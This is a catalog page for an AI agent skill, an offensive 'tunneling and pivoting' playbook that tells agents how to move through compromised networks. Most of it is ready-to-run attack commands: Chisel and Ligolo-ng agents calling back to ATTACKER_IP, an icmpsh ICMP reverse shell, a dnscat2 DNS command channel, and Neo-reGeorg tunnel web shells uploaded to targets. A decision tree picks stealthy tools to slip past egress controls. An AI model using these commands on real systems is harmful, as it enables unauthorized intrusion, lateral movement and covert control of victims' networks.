tunneling-and-pivoting
Tunneling and pivoting playbook. Use when establishing network tunnels through compromised hosts including SSH tunneling, Chisel, Ligolo-ng, socat, DNS/ICMP/HTTP tunneling, ProxyChains, and multi-layer pivoting strategies.
How do I install this agent skill?
npx skills add https://github.com/yaklang/hack-skills --skill tunneling-and-pivotingIs this agent skill safe to install?
- Gen Agent Trust Hubpass
This skill is a technical reference playbook for network tunneling and pivoting. It provides instructional command-line examples for establishing network connectivity through compromised hosts using various protocols and tools.
- Socketwarn
1 alert: gptSecurity
- Snykfail
Risk: CRITICAL · 3 issues
- ZeroLeakspass
1 finding · Score: 82/100
What does this agent skill do?
SKILL: Tunneling & Pivoting — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert tunneling and pivoting techniques. Covers SSH port forwarding (local/remote/dynamic/jump), Chisel reverse SOCKS, Ligolo-ng transparent TUN pivoting, socat relays, DNS/ICMP/HTTP tunneling, ProxyChains configuration, Windows pivoting (netsh/plink), and multi-layer chaining. Base models miss egress-aware tool selection and transparent routing setup.
0. RELATED ROUTING
Before going deep, consider loading:
- network-protocol-attacks for network-level attacks from pivot positions
- reverse-shell-techniques for establishing initial access shells
- unauthorized-access-common-services for exploiting services discovered through pivots
- linux-privilege-escalation or windows-privilege-escalation after pivoting to new hosts
1. SSH TUNNELING
Local Port Forward
Forward a local port to a remote service through the pivot.
# Access INTERNAL_HOST:3306 via localhost:3306
ssh -L 3306:INTERNAL_HOST:3306 user@PIVOT -N
# Access internal web app
ssh -L 8080:10.10.10.100:80 user@PIVOT -N
# Browse: http://localhost:8080
# Bind to all interfaces (share with teammates)
ssh -L 0.0.0.0:8080:INTERNAL:80 user@PIVOT -N
Remote Port Forward
Expose a local service to the pivot host's network.
# Make attacker's port 8000 accessible on pivot as pivot:9000
ssh -R 9000:127.0.0.1:8000 user@PIVOT -N
# Expose attacker's listener to internal network
ssh -R 0.0.0.0:4444:127.0.0.1:4444 user@PIVOT -N
# Internal hosts connect to PIVOT:4444 → reaches attacker:4444
Dynamic Port Forward (SOCKS Proxy)
# Create SOCKS4/5 proxy on localhost:1080
ssh -D 1080 user@PIVOT -N
# Use with proxychains
echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf
proxychains nmap -sT -Pn -p 80,443,445 INTERNAL_SUBNET/24
# Or with browser SOCKS proxy → browse internal web apps
Jump Host (ProxyJump)
# Single jump
ssh -J jumphost user@TARGET
# Multiple jumps
ssh -J jump1,jump2 user@TARGET
# SSH config for persistent jump
# ~/.ssh/config
Host internal-target
HostName 10.10.10.100
User admin
ProxyJump user@jumphost.example.com
2. CHISEL
Reverse SOCKS Proxy (Most Common)
# Attacker: start chisel server
chisel server --reverse --port 8080
# Victim: connect back as client, create reverse SOCKS
chisel client ATTACKER_IP:8080 R:socks
# Result: SOCKS5 proxy on attacker's 127.0.0.1:1080
proxychains nmap -sT -Pn INTERNAL/24
Port Forwarding
# Forward specific port
chisel client ATTACKER:8080 R:3306:INTERNAL_DB:3306
# Multiple forwards
chisel client ATTACKER:8080 R:3306:DB:3306 R:8080:WEB:80
# Reverse port forward (expose attacker service to victim network)
chisel client ATTACKER:8080 R:0.0.0.0:4444:127.0.0.1:4444
3. LIGOLO-NG
TUN interface-based pivoting — transparent routing without SOCKS.
# Attacker: start proxy
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
ligolo-proxy -selfcert -laddr 0.0.0.0:11601
# Agent (victim): connect to proxy
ligolo-agent -connect ATTACKER_IP:11601 -ignore-cert
# In ligolo-proxy console:
>> session # select agent session
>> ifconfig # view agent's network interfaces
>> start # start tunnel
# Add routes on attacker to reach internal networks
sudo ip route add 10.10.10.0/24 dev ligolo
sudo ip route add 172.16.0.0/16 dev ligolo
Listener (Reverse Shell Catcher Through Pivot)
# In ligolo-proxy console:
>> listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp
# Internal hosts connecting to AGENT:4444 → forwarded to attacker:4444
Double Pivot
# Agent 1 on DMZ → tunnel to internal network 1
# Agent 2 on internal network 1 → tunnel to internal network 2
# Add routes for both networks on attacker
sudo ip route add 10.0.0.0/24 dev ligolo # via agent 1
sudo ip route add 172.16.0.0/24 dev ligolo # via agent 2
4. SOCAT
# TCP port forward
socat TCP-LISTEN:8080,fork TCP:INTERNAL:80
# UDP relay
socat UDP-LISTEN:53,fork UDP:INTERNAL_DNS:53
# Encrypted tunnel
socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork TCP:INTERNAL:80
# File transfer via socat
# Receiver:
socat TCP-LISTEN:9999,fork file:received_file,create
# Sender:
socat TCP:RECEIVER:9999 file:send_file
5. PROXYCHAINS / PROXIFIER
ProxyChains Configuration
# /etc/proxychains4.conf
strict_chain # fail if any proxy is down
# dynamic_chain # skip dead proxies
# random_chain # randomize proxy order
[ProxyList]
socks5 127.0.0.1 1080 # first hop (SSH dynamic forward)
socks5 127.0.0.1 1081 # second hop (if chaining)
# Usage
proxychains nmap -sT -Pn -p 22,80,445 10.10.10.0/24
proxychains crackmapexec smb 10.10.10.0/24
proxychains evil-winrm -i 10.10.10.50 -u admin -p pass
6. WINDOWS PIVOTING
Netsh Port Forwarding
:: Forward port (requires admin)
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=INTERNAL_IP
:: List forwards
netsh interface portproxy show all
:: Remove
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0
Plink (PuTTY CLI)
:: Dynamic SOCKS (like ssh -D)
plink.exe -ssh -D 1080 -N user@ATTACKER
:: Remote port forward
plink.exe -ssh -R 4444:127.0.0.1:4444 user@ATTACKER
:: Automated (non-interactive, accept host key)
echo y | plink.exe -ssh -l user -pw password -R 9050:127.0.0.1:9050 ATTACKER
7. DNS TUNNELING
# iodine — IP-over-DNS
# Server (attacker, with NS record pointing to attacker):
iodined -f -c -P password 10.0.0.1 t1.yourdomain.com
# Client (victim):
iodine -f -P password t1.yourdomain.com
# Creates dns0 interface → route traffic through it
# dnscat2 — command channel over DNS
# Server:
ruby dnscat2.rb yourdomain.com
# Client:
./dnscat --dns=server=ATTACKER,port=53 --secret=SHARED_SECRET
8. ICMP TUNNELING
# icmpsh — ICMP reverse shell (no raw socket on victim needed for Windows)
# Attacker:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
python3 icmpsh_m.py ATTACKER_IP VICTIM_IP
# Victim (Windows):
icmpsh.exe -t ATTACKER_IP
# ptunnel-ng — TCP-over-ICMP
# Server:
ptunnel-ng -r INTERNAL_HOST -R 22
# Client:
ptunnel-ng -p PIVOT_IP -l 2222 -r INTERNAL_HOST -R 22
ssh -p 2222 user@127.0.0.1
9. HTTP TUNNELING
# Neo-reGeorg — SOCKS proxy via web shell
# Generate tunnel web shell:
python3 neoreg.py generate -k PASSWORD
# Upload tunnel.php/aspx/jsp to target web server
# Connect:
python3 neoreg.py -k PASSWORD -u http://TARGET/tunnel.php
# SOCKS proxy on 127.0.0.1:1080
# Tunna — HTTP tunnel (alternative)
python2 proxy.py -u http://TARGET/conn.php -l 4444 -r 3389 -a INTERNAL_IP
10. PIVOTING DECISION MATRIX
| Egress Allowed | Tool | Notes |
|---|---|---|
| TCP outbound (any port) | Chisel, Ligolo-ng, SSH | Fastest setup |
| TCP 80/443 only | Chisel (HTTP/S), Neo-reGeorg | Blend with web traffic |
| DNS only (53/udp) | iodine, dnscat2 | Slow but stealthy |
| ICMP only | ptunnel-ng, icmpsh | Very restricted environments |
| No outbound | Bind shell + port forward in | Needs inbound access to pivot |
| Web shell only | Neo-reGeorg, Tunna | When only HTTP file upload works |
11. DECISION TREE
Compromised host — need to reach internal network
│
├── Can install tools on pivot?
│ ├── YES + outbound TCP allowed?
│ │ ├── Need transparent routing? → Ligolo-ng (§3)
│ │ ├── Need SOCKS proxy? → Chisel reverse SOCKS (§2)
│ │ └── SSH available? → SSH dynamic forward (§1)
│ │
│ ├── YES + only HTTP(S) outbound?
│ │ ├── Chisel over HTTPS (§2)
│ │ └── Upload web tunnel → Neo-reGeorg (§9)
│ │
│ ├── YES + only DNS outbound?
│ │ └── iodine or dnscat2 (§7)
│ │
│ └── YES + only ICMP allowed?
│ └── ptunnel-ng or icmpsh (§8)
│
├── Cannot install tools (web shell only)?
│ └── Neo-reGeorg / Tunna via web shell (§9)
│
├── Windows pivot?
│ ├── Admin access? → netsh portproxy (§6)
│ ├── SSH client available? → ssh.exe (Windows 10+) (§1)
│ └── Outbound SSH? → plink (§6)
│
├── Need multi-layer pivot?
│ ├── Ligolo-ng: multiple agents + route stacking (§3)
│ ├── SSH ProxyJump chaining (§1)
│ └── ProxyChains with multiple SOCKS (§5)
│
└── Teammate needs access too?
├── Bind SOCKS on 0.0.0.0 (ssh -L 0.0.0.0:...)
└── Share Ligolo-ng routes via common proxy
How can the creator link this skill?
Add the canonical catalog link to the repository README so users can inspect current installs and available audits. The publishing guide covers the complete discovery path.
<a href="https://skillzs.dev/skills/yaklang/hack-skills/tunneling-and-pivoting">View tunneling-and-pivoting on skillZs</a>